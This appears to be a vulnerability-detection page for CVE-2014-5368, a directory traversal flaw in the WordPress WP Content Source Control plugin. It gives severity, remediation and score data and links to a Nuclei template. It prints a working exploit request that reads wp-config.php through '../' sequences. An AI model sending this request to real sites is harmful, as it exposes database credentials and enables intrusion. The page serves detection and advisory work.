🔙 목록으로 돌아가기

CVE-2014-5368: WordPress Plugin WP Content Source Control - Directory Traversal

TitleWordPress Plugin WP Content Source Control - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.
RemediationUpdate to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability.
CVSS Score5
EPSS Score0.53297
CVE IDCVE-2014-5368
CWE IDCWE-22
Tags cve2014 cve wordpress wp-plugin lfi edb seclists wp_content_source_control_project vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.

🌐 HTTP Request

GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/15.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-5368.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-5368.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A